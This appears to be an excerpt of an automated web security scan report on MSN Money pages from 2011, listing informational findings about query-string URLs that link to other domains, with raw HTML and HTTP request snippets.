<div class="ic-usr-img"><a class="ic-usr-pro-url" href="http://cid-d57746aa4764d3c8.profile.live.com/msn/posts?mkt=en-US&domain=en-US"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XbSfkbl2R0BF4ZqaDkpm7f95iLMWvx8bJ?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<div class="ic-usr-nm"><a href="http://cid-e207b0329a76e0ad.profile.live.com/msn/posts?mkt=en-US&domain=en-US">Someone
..(wishful45)
</a>
...[SNIP]...
<div class="ic-usr-img"><a class="ic-usr-pro-url" href="http://cid-e207b0329a76e0ad.profile.live.com/msn/posts?mkt=en-US&domain=en-US"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<div class="ic-usr-nm"><a href="http://cid-8d30c9ab59419904.profile.live.com/msn/posts?mkt=en-US&domain=en-US">Malcolm Walker
..(gridnight)
</a>
...[SNIP]...
<div class="ic-usr-img"><a class="ic-usr-pro-url" href="http://cid-8d30c9ab59419904.profile.live.com/msn/posts?mkt=en-US&domain=en-US"><img alt="avatar" src="http://byfiles.storage.redacted/y1m0FdnXk-Vjv78jlRgRJo9T1sIoZzPSsi5ODGnPoiX1tRqiM-j-cc9RSyn230Rb5ItlC4mQYzpf0i3HojYGwGR0Q" />
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XfJjjOLLsjhdTb4kuGZBLAKdqdVvOwtuc?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XsnDaHHPT68CsmSvtVijsfPyAWKHkeltN?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/X3e-um2PQYYhgl12G1OQaJcxxr5hEWRbg?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<div class="ic-usr-nm"><a href="http://cid-62a22a6dc88d7132.profile.live.com/msn/posts?mkt=en-US&domain=en-US">Bill H</a>
...[SNIP]...
<div class="ic-usr-img"><a class="ic-usr-pro-url" href="http://cid-62a22a6dc88d7132.profile.live.com/msn/posts?mkt=en-US&domain=en-US"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/Xu-wZWlDmiUvCCrBuuOhmcI8fmnkZ4HfR?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/X0Jb-asV9wuh8rlzoSI4St2M52NriGjQX?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XtSNSqQgFZPsfB459aCi3rdya394_WRos?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<span>Please help us to maintain a healthy and vibrant community by reporting any illegal or inappropriate behavior. If you believe a message violates the<a id="raconductcode" class="iucrptlnk" href="http://help.live.com/help.aspx?mkt=en-gb&project=tou&querytype=keyword&query=coc" title="View the code of conduct in a new window">Code of Conduct</a>
...[SNIP]...
<p>Fundamental company data and historical chart data provided by <a href="http://www.reuters.com/">Thomson Reuters</a> (<a href="http://about.reuters.com/media/customer_support/branding/popups/full_legal_notice.htm">click for restrictions</a>). Real-time quotes provided by <a href="http://www.batstrading.com/">BATS Exchange</a>. Real-time index quotes and delayed quotes supplied by <a href="http://www.interactivedata-rts.com/">Interactive Data Real-Time Services</a>. Fund summary, fund performance and dividend data provided by <a href="http://www.morningstar.com/">Morningstar Inc</a>. Analyst recommendations provided by <a href="http://www.zacks.com/">Zacks Investment Research</a>. IPO data provided by <a href="http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml">Hoover's Inc</a>. Index membership data provided by <a href="http://www.six-telekurs.com/tkfich_index/tkfich_home.htm">SIX Telekurs</a>
...[SNIP]...
<p>Japanese stock price data provided by <a href="http://www.nri.co.jp/english/">Nomura Research Institute Ltd</a>.; quotes delayed 20 minutes. Canadian fund data provided by <a href="http://www.cannex.com/">CANNEX Financial Exchanges Ltd</a>
...[SNIP]...
<div style="float:right;margin-left:100px" class="provided-by-insure"><a href="http://www.insure.com"><img src="http://moneycentral.redacted/content/data/partner-tools/auto-insurance-quotes_insure-logo.jpg" width="179" height="15" alt="insure" />
...[SNIP]...
<div class="insure-link" style="margin-right:20px; margin-top:-2px;"><a href="http://www.insure.com">Car insurance quotes</a>
...[SNIP]...
<li class="first"><a href="http://www.insure.com/car-insurance/policy-save.html"> How to save money on car insurance</a>
...[SNIP]...
<li><a href="http://www.insure.com/car-insurance/driver-distractions.html"> 10 most dangerous foods to eat while driving</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=Does+car+insurance+lower+at+a+certain+age&form=money3">Do car insurance rates fall at a certain age?</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=Does+auto+insurance+cover+the+car+or+the+person&form=money3">Does car insurance cover the car or the person?</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=What+happens+if+I+have+an+accident+and+no+car+insurance%3F&form=money3">What happens if I have an accident and no car insurance?</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=What+car+is+considered+high+risk+on+auto+insurance&form=money3">What cars are considered high risk?</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=what+is+sr22+insurance&form=money3">What is an SR-22 policy?</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search?q=what+is+gap+insurance&form=money3">What is gap insurance?</a>
...[SNIP]...
<li class="ter"><a href="http://msn.careerbuilder.com/Article/MSN-2482-Salaries-Promotions-5-Secrets-to-climbing-the-ladder-faster/?SiteId=cbmsnhp42482&sc_extcmp=JS_2482_home1&ocid=xnetr2-3">5 secrets to climbing the ladder faster</a>
...[SNIP]...
<li class="ter"><a href="http://www.slate.com/id/2282620?ocid=xnetr2-4">Is Facebook making us miserable?</a>
...[SNIP]...
</a><a href="http://ccc01.opinionlab.com/o.asp?id=swHtlTXj">Feedback</a>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170">Privacy</a>
...[SNIP]...
<li class="first"><a href="http://onlinehelp.microsoft.com/en-us/msn/money.aspx">Help</a></li><li><a href="http://advertising.microsoft.com/msn/">About our ads</a>
...[SNIP]...
<li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=AmrwytcP&resize=false">Feedback</a>
...[SNIP]...
</script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script>
...[SNIP]...

22.177. http://money.redacted/auto-insurance/article.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://money.redacted
Path:	/auto-insurance/article.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://money.redacted/auto-insurance/article.aspx?post=7e2e7469-2f32-4c49-a3c2-54bda9bb436b&GT1=33004

The response contains the following links to other domains:

http://about.reuters.com/media/customer_support/branding/popups/full_legal_notice.htm
http://advertising.microsoft.com/msn/
http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js
http://blu.stc.s-redacted/br/scp/css/15/decoration/toolbar/rating/down_normal.gif
http://blu.stc.s-redacted/br/scp/css/15/decoration/toolbar/rating/up_normal.gif
http://ccc01.opinionlab.com/o.asp?id=swHtlTXj
http://cid-62a22a6dc88d7132.profile.live.com/msn/posts?mkt=en-US&domain=en-US
http://cid-8d30c9ab59419904.profile.live.com/msn/posts?mkt=en-US&domain=en-US
http://cid-a842a8a81ab60686.profile.live.com/msn/posts?mkt=en-US&domain=en-US
http://cid-d57746aa4764d3c8.profile.live.com/msn/posts?mkt=en-US&domain=en-US
http://cid-e207b0329a76e0ad.profile.live.com/msn/posts?mkt=en-US&domain=en-US
http://explore.live.com/windows-live-messenger
http://go.microsoft.com/fwlink/?LinkId=74170
http://help.live.com/help.aspx?mkt=en-gb&project=tou&querytype=keyword&query=coc
http://img.widgets.video.s-redacted/js/ch/channels.css
http://img.widgets.video.s-redacted/js/embed.js
http://mail.live.com/
http://media.social.s-msn.com/images/blogs/00120065-0000-0000-0000-000000000000_00000065-075e-0000-0000-000000000000_20110128210926_carinsurance.com-logo.gif
http://msn.careerbuilder.com/Article/MSN-2482-Salaries-Promotions-5-Secrets-to-climbing-the-ladder-faster/?SiteId=cbmsnhp42482&sc_extcmp=JS_2482_home1&ocid=xnetr2-3
http://msn.careerbuilder.com/msn/default.aspx
http://msn.foxsports.com/
http://msn.whitepages.com/
http://onlinehelp.microsoft.com/en-us/msn/money.aspx
http://onlinehelp.microsoft.com/en-us/msn/thebasics.aspx
http://us.social.s-msn.com/s/images/bluemannxl.png
http://www.batstrading.com/
http://www.bing.com/search
http://www.bing.com/search/?FORM=MSMONY&mkt=en-US
http://www.bing.com/search?q=Does+auto+insurance+cover+the+car+or+the+person&form=money3
http://www.bing.com/search?q=Does+car+insurance+lower+at+a+certain+age&form=money3
http://www.bing.com/search?q=Ophiuchus+Horoscope&form=MSMONY
http://www.bing.com/search?q=Virgo+Horoscope&FORM=MSMONY
http://www.bing.com/search?q=What+car+is+considered+high+risk+on+auto+insurance&form=money3
http://www.bing.com/search?q=What+happens+if+I+have+an+accident+and+no+car+insurance%3F&form=money3
http://www.bing.com/search?q=allstate+insurance&FORM=MSMONY
http://www.bing.com/search?q=scorpio+Horoscope&form=MSMONY
http://www.bing.com/search?q=what+is+gap+insurance&form=money3
http://www.bing.com/search?q=what+is+sr22+insurance&form=money3
http://www.bing.com/search?q=zodiac+calendar&form=MSMONY
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.cannex.com/
http://www.carinsurance.com/
http://www.carinsurance.com/Articles/auto-insurance-companies-stand-out.aspx
http://www.carinsurance.com/Articles/cars-that-attract-ladies.aspx
http://www.carinsurance.com/Articles/five-most-dangerous-cars.aspx
http://www.delish.com/
http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml
http://www.insure.com/
http://www.insure.com/car-insurance/driver-distractions.html
http://www.insure.com/car-insurance/policy-save.html
http://www.interactivedata-rts.com/
http://www.morningstar.com/
http://www.myhomeredacted/
http://www.nri.co.jp/english/
http://www.reuters.com/
http://www.six-telekurs.com/tkfich_index/tkfich_home.htm
http://www.slate.com/id/2282620?ocid=xnetr2-4
http://www.zacks.com/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296344893&rver=6.1.6195.0&wp=MBI&wreply=http:%2F%2Fmoney.redacted%2Fauto-insurance%2Farticle.aspx%3Fpost%3D7e2e7469-2f32-4c49-a3c2-54bda9bb436b%26GT1%3D33004&lc=1033&id=250710
https://secure.bundle.com/msn
https://secure.opinionlab.com/ccc01/o.asp?ID=AmrwytcP&resize=false

Request

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: MC1=V=3&GUID=b9ca87d1597640e8986ce7a895915a2c; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
S: CO1MPPRENM08
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sat, 29 Jan 2011 23:48:13 GMT
Content-Length: 148161

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><link rel="stylesheet" type="text/css" href="http://img.widgets.video.s-redacted/js/ch/channels.css" media="all" /><script type="text/javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com/msn/default.aspx">Careers & Jobs</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/">Sports</a></li><li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV">Travel</a>
...[SNIP]...
<li class="hotmail"><a href="http://mail.live.com/" class="inbox">Hotmail</a></li><li><a class="msgr" href="http://explore.live.com/windows-live-messenger">Messenger</a></li><li class="last"><a href="http://www.bing.com/search/?FORM=MSMONY&mkt=en-US">Bing</a></li></ul><div class="myhp"><a href="http://www.myhomeredacted">Make MSN your homepage</a>
...[SNIP]...
<li class="last"><a href="http://onlinehelp.microsoft.com/en-us/msn/thebasics.aspx">Help</a>
...[SNIP]...
<li class="pipe signin"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296344893&rver=6.1.6195.0&wp=MBI&wreply=http:%2F%2Fmoney.redacted%2Fauto-insurance%2Farticle.aspx%3Fpost%3D7e2e7469-2f32-4c49-a3c2-54bda9bb436b%26GT1%3D33004&lc=1033&id=250710" class="dMSNME_1">Sign in</a>
...[SNIP]...
</span><a href="http://www.bing.com/search" class="last">Web</a>
...[SNIP]...
<li><a href="https://secure.bundle.com/msn">MY MONEY</a>
...[SNIP]...
<i> comes from Barbara Marquand at <a href="http://www.carinsurance.com/" title="http://www.carinsurance.com/">CarInsurance.com</a>
...[SNIP]...
<p><a href="http://www.carinsurance.com/" title="http://www.carinsurance.com/"><img src="http://media.social.s-redacted/images/blogs/00120065-0000-0000-0000-000000000000_00000065-075e-0000-0000-000000000000_20110128210926_carinsurance.com-logo.gif" alt="CarInsurance.com on MSN Money" class="imagefloatright userImage lead" /></a>In the wake of recent news that the <a href="http://www.bing.com/search?q=zodiac+calendar&form=MSMONY" title="http://www.bing.com/search?q=zodiac+calendar&form=MSMONY">zodiac calendar</a> requires updating, <a href="http://www.bing.com/search?q=allstate+insurance&FORM=MSMONY" title="http://www.bing.com/search?q=allstate+insurance&FORM=MSMONY">Allstate Insurance</a>
...[SNIP]...
<p><a href="http://www.bing.com/search?q=Virgo+Horoscope&FORM=MSMONY" title="http://www.bing.com/search?q=Virgo+Horoscope&FORM=MSMONY">Virgos</a>
...[SNIP]...
<p>People born under the sign were almost seven times more likely to be in a car accident last year when compared to <a href="http://www.bing.com/search?q=scorpio+Horoscope&form=MSMONY" title="http://www.bing.com/search?q=scorpio+Horoscope&form=MSMONY">Scorpios</a>
...[SNIP]...
<p>The "new" sign, <a href="http://www.bing.com/search?q=Ophiuchus+Horoscope&form=MSMONY" title="http://www.bing.com/search?q=Ophiuchus+Horoscope&form=MSMONY">Ophiuchus</a>
...[SNIP]...
</b><a href="http://www.carinsurance.com/" title="http://www.carinsurance.com/"><b>
...[SNIP]...
<li><a href="http://www.carinsurance.com/Articles/auto-insurance-companies-stand-out.aspx" title="http://www.carinsurance.com/Articles/auto-insurance-companies-stand-out.aspx">Auto insurance companies try to stand out from the crowd</a>
...[SNIP]...
<li><a href="http://www.carinsurance.com/Articles/five-most-dangerous-cars.aspx" title="http://www.carinsurance.com/Articles/five-most-dangerous-cars.aspx">The 5 most dangerous cars around</a>
...[SNIP]...
<li><a href="http://www.carinsurance.com/Articles/cars-that-attract-ladies.aspx" title="http://www.carinsurance.com/Articles/cars-that-attract-ladies.aspx">Cars that attract the ladies</a>
...[SNIP]...
);" href="http://money.msn.com/auto-insurance/article.aspx?post=7e2e7469-2f32-4c49-a3c2-54bda9bb436b&GT1=33004&rrurt=1&rrcontrolId=ratCntrlBinary" title="You recommend this" rel="nofollow"><img id="ratCntrlBinaryYesButton" class="rrimg" src="http://blu.stc.s-msn.com/br/scp/css/15/decoration/toolbar/rating/up_normal.gif" title="You recommend this" alt="You recommend this" /><span id="rrBCYesPer" class="rrbpercent">
...[SNIP]...
ef="http://money.redacted/auto-insurance/article.aspx?post=7e2e7469-2f32-4c49-a3c2-54bda9bb436b&GT1=33004&rrurt=0&rrcontrolId=ratCntrlBinary" title="You don't recommend this" rel="nofollow"><img id="ratCntrlBinaryNoButton" class="rrimg" src="http://blu.stc.s-msn.com/br/scp/css/15/decoration/toolbar/rating/down_normal.gif" title="You don't recommend this" alt="You don't recommend this" /><span id="rrBCNoPer" class="rrbpercent">
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XGF82iL2owd0niRqXndlsObUL4TDaFSUS?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<div class="ic-usr-nm"><a href="http://cid-a842a8a81ab60686.profile.live.com/msn/posts?mkt=en-US&domain=en-US">Jason Halliburton
..(xBWOMPx)
</a>
...[SNIP]...
<div class="ic-usr-img"><a class="ic-usr-pro-url" href="http://cid-a842a8a81ab60686.profile.live.com/msn/posts?mkt=en-US&domain=en-US"><img alt="avatar" src="http://byfiles.storage.redacted/y1mviPxdqnTcFn7a679zN5TVH1DDZxWNbV6WUNG3lxcobNMaiLBTOorg0uNGOOxD8cwRpSBxTa-v1hTG9p826dosA" />
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XjEOTPvlDhopN8tJV9ggDXge6VoBpROKr?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XDDuwokFY_SngegAzwydGUhlRy0U6SVbz?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XSJ_NuxgD9S-NsAGt9iez06YT1T3z4bIy?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XxUooOtG0aQGn7lmyRZ521lfgFNbwT85r?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XrMHqap29l6sPXPOau00RiJSjNjxfDcg2?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XVAn9safTFrPEMR0pgIqDmO_jTEmXlT_g?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<div class="ic-usr-nm"><a href="http://cid-d57746aa4764d3c8.profile.live.com/msn/posts?mkt=en-US&domain=en-US">Barbara Searles Labelle
..(law abiding631)
</a>
...[SNIP]...
<div class="ic-usr-img"><a class="ic-usr-pro-url" href="http://cid-d57746aa4764d3c8.profile.live.com/msn/posts?mkt=en-US&domain=en-US"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XbSfkbl2R0BF4ZqaDkpm7f95iLMWvx8bJ?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<div class="ic-usr-nm"><a href="http://cid-e207b0329a76e0ad.profile.live.com/msn/posts?mkt=en-US&domain=en-US">Someone
..(wishful45)
</a>
...[SNIP]...
<div class="ic-usr-img"><a class="ic-usr-pro-url" href="http://cid-e207b0329a76e0ad.profile.live.com/msn/posts?mkt=en-US&domain=en-US"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<div class="ic-usr-nm"><a href="http://cid-8d30c9ab59419904.profile.live.com/msn/posts?mkt=en-US&domain=en-US">Malcolm Walker
..(gridnight)
</a>
...[SNIP]...
<div class="ic-usr-img"><a class="ic-usr-pro-url" href="http://cid-8d30c9ab59419904.profile.live.com/msn/posts?mkt=en-US&domain=en-US"><img alt="avatar" src="http://byfiles.storage.redacted/y1m0FdnXk-Vjv78jlRgRJo9T1sIoZzPSsi5ODGnPoiX1tRqiM-j-cc9RSyn230Rb5ItlC4mQYzpf0i3HojYGwGR0Q" />
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XfJjjOLLsjhdTb4kuGZBLAKdqdVvOwtuc?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XsnDaHHPT68CsmSvtVijsfPyAWKHkeltN?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/X3e-um2PQYYhgl12G1OQaJcxxr5hEWRbg?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<div class="ic-usr-nm"><a href="http://cid-62a22a6dc88d7132.profile.live.com/msn/posts?mkt=en-US&domain=en-US">Bill H</a>
...[SNIP]...
<div class="ic-usr-img"><a class="ic-usr-pro-url" href="http://cid-62a22a6dc88d7132.profile.live.com/msn/posts?mkt=en-US&domain=en-US"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/Xu-wZWlDmiUvCCrBuuOhmcI8fmnkZ4HfR?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/X0Jb-asV9wuh8rlzoSI4St2M52NriGjQX?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XtSNSqQgFZPsfB459aCi3rdya394_WRos?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<span>Please help us to maintain a healthy and vibrant community by reporting any illegal or inappropriate behavior. If you believe a message violates the<a id="raconductcode" class="iucrptlnk" href="http://help.live.com/help.aspx?mkt=en-gb&project=tou&querytype=keyword&query=coc" title="View the code of conduct in a new window">Code of Conduct</a>
...[SNIP]...
<p>Fundamental company data and historical chart data provided by <a href="http://www.reuters.com/">Thomson Reuters</a> (<a href="http://about.reuters.com/media/customer_support/branding/popups/full_legal_notice.htm">click for restrictions</a>). Real-time quotes provided by <a href="http://www.batstrading.com/">BATS Exchange</a>. Real-time index quotes and delayed quotes supplied by <a href="http://www.interactivedata-rts.com/">Interactive Data Real-Time Services</a>. Fund summary, fund performance and dividend data provided by <a href="http://www.morningstar.com/">Morningstar Inc</a>. Analyst recommendations provided by <a href="http://www.zacks.com/">Zacks Investment Research</a>. IPO data provided by <a href="http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml">Hoover's Inc</a>. Index membership data provided by <a href="http://www.six-telekurs.com/tkfich_index/tkfich_home.htm">SIX Telekurs</a>
...[SNIP]...
<p>Japanese stock price data provided by <a href="http://www.nri.co.jp/english/">Nomura Research Institute Ltd</a>.; quotes delayed 20 minutes. Canadian fund data provided by <a href="http://www.cannex.com/">CANNEX Financial Exchanges Ltd</a>
...[SNIP]...
<div style="float:right;margin-left:100px" class="provided-by-insure"><a href="http://www.insure.com"><img src="http://moneycentral.redacted/content/data/partner-tools/auto-insurance-quotes_insure-logo.jpg" width="179" height="15" alt="insure" />
...[SNIP]...
<div class="insure-link" style="margin-right:20px; margin-top:-2px;"><a href="http://www.insure.com">Car insurance quotes</a>
...[SNIP]...
<li class="first"><a href="http://www.insure.com/car-insurance/policy-save.html"> How to save money on car insurance</a>
...[SNIP]...
<li><a href="http://www.insure.com/car-insurance/driver-distractions.html"> 10 most dangerous foods to eat while driving</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=Does+car+insurance+lower+at+a+certain+age&form=money3">Do car insurance rates fall at a certain age?</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=Does+auto+insurance+cover+the+car+or+the+person&form=money3">Does car insurance cover the car or the person?</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=What+happens+if+I+have+an+accident+and+no+car+insurance%3F&form=money3">What happens if I have an accident and no car insurance?</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=What+car+is+considered+high+risk+on+auto+insurance&form=money3">What cars are considered high risk?</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=what+is+sr22+insurance&form=money3">What is an SR-22 policy?</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search?q=what+is+gap+insurance&form=money3">What is gap insurance?</a>
...[SNIP]...
<li class="ter"><a href="http://msn.careerbuilder.com/Article/MSN-2482-Salaries-Promotions-5-Secrets-to-climbing-the-ladder-faster/?SiteId=cbmsnhp42482&sc_extcmp=JS_2482_home1&ocid=xnetr2-3">5 secrets to climbing the ladder faster</a>
...[SNIP]...
<li class="ter"><a href="http://www.slate.com/id/2282620?ocid=xnetr2-4">Is Facebook making us miserable?</a>
...[SNIP]...
</a><a href="http://ccc01.opinionlab.com/o.asp?id=swHtlTXj">Feedback</a>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170">Privacy</a>
...[SNIP]...
<li class="first"><a href="http://onlinehelp.microsoft.com/en-us/msn/money.aspx">Help</a></li><li><a href="http://advertising.microsoft.com/msn/">About our ads</a>
...[SNIP]...
<li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=AmrwytcP&resize=false">Feedback</a>
...[SNIP]...
</script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script>
...[SNIP]...

22.178. http://money.redacted/business-news/article.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://money.redacted
Path:	/business-news/article.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://money.redacted/business-news/article.aspx?feed=AP&date=20110129&id=12845569

The response contains the following links to other domains:

http://about.reuters.com/media/customer_support/branding/popups/full_legal_notice.htm
http://advertising.microsoft.com/msn/
http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js
http://ccc01.opinionlab.com/o.asp?id=swHtlTXj
http://explore.live.com/windows-live-messenger
http://go.microsoft.com/fwlink/?LinkId=74170
http://img.widgets.video.s-redacted/js/ch/channels.css
http://img.widgets.video.s-redacted/js/embed.js
http://mail.live.com/
http://msn.careerbuilder.com/msn/default.aspx
http://msn.foxsports.com/
http://msn.whitepages.com/
http://onlinehelp.microsoft.com/en-us/msn/money.aspx
http://onlinehelp.microsoft.com/en-us/msn/thebasics.aspx
http://www.batstrading.com/
http://www.bing.com/search
http://www.bing.com/search/?FORM=MSMONY&mkt=en-US
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.bloomberg.com/news/2010-12-21/shell-qatar-to-sign-agreement-today-for-major-petrochemical-project.html?cmpid=msnmoney
http://www.businessweek.com/bwdaily/headlinefeed.js
http://www.cannex.com/
http://www.delish.com/
http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml
http://www.interactivedata-rts.com/
http://www.morningstar.com/
http://www.myhomeredacted/
http://www.nri.co.jp/english/
http://www.reuters.com/
http://www.six-telekurs.com/tkfich_index/tkfich_home.htm
http://www.zacks.com/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296353455&rver=6.1.6195.0&wp=MBI&wreply=http:%2F%2Fmoney.redacted%2Fbusiness-news%2Farticle.aspx%3Ffeed%3DAP%26date%3D20110129%26id%3D12845569&lc=1033&id=250710
https://secure.bundle.com/msn
https://secure.opinionlab.com/ccc01/o.asp?ID=AmrwytcP&resize=false

Request

GET /business-news/article.aspx?feed=AP&date=20110129&id=12845569 HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

22.179. http://money.redacted/business-news/article.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://money.redacted
Path:	/business-news/article.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://money.redacted/business-news/article.aspx?feed=AP&date=20110129&id=12845569

The response contains the following links to other domains:

http://about.reuters.com/media/customer_support/branding/popups/full_legal_notice.htm
http://advertising.microsoft.com/msn/
http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js
http://ccc01.opinionlab.com/o.asp?id=swHtlTXj
http://explore.live.com/windows-live-messenger
http://go.microsoft.com/fwlink/?LinkId=74170
http://img.widgets.video.s-redacted/js/ch/channels.css
http://img.widgets.video.s-redacted/js/embed.js
http://mail.live.com/
